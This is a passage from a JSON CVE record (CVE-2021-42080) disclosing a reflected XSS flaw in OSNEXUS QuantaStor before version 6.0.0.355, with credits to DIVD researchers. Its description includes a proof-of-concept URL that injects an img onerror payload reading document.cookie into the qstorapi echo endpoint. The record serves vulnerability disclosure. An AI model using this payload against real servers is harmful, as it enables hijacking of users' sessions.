{
"dataType": "CVE_RECORD",
"dataVersion": "5.1",
"cveMetadata": {
"cveId": "CVE-2021-42080",
"assignerOrgId": "b87402ff-ae37-4194-9dae-31abdbd6f217",
"state": "PUBLISHED",
"assignerShortName": "DIVD",
"dateReserved": "2021-10-07T17:12:57.677Z",
"datePublished": "2023-07-10T06:29:48.166Z",
"dateUpdated": "2025-09-22T06:40:04.494Z"
},
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unknown",
"product": "QuantaStor",
"vendor": "OSNEXUS",
"versions": [
{
"lessThan": "6.0.0.355",
"status": "affected",
"version": "0",
"versionType": "semver"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "Wietse Boonstra (DIVD)"
},
{
"lang": "en",
"type": "analyst",
"value": "Frank Breedijk (DIVD)"
},
{
"lang": "en",
"type": "analyst",
"value": "Victor Pasman (DIVD)"
},
{
"lang": "en",
"type": "analyst",
"value": "Victor Gevers (DIVD)"
},
{
"lang": "en",
"type": "analyst",
"value": "Max van der Horst (DIVD)"
},
{
"lang": "en",
"type": "analyst",
"value": "Célistine Oosting (DIVD)"
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "An attacker is able to launch a Reflected XSS attack using a crafted URL.
POC:
Visit the following URL
https://<IPADDRESS>:8153/qstorapi/echo?inputMessage=<img%20src=x%20onerror=alert(document.cookie)>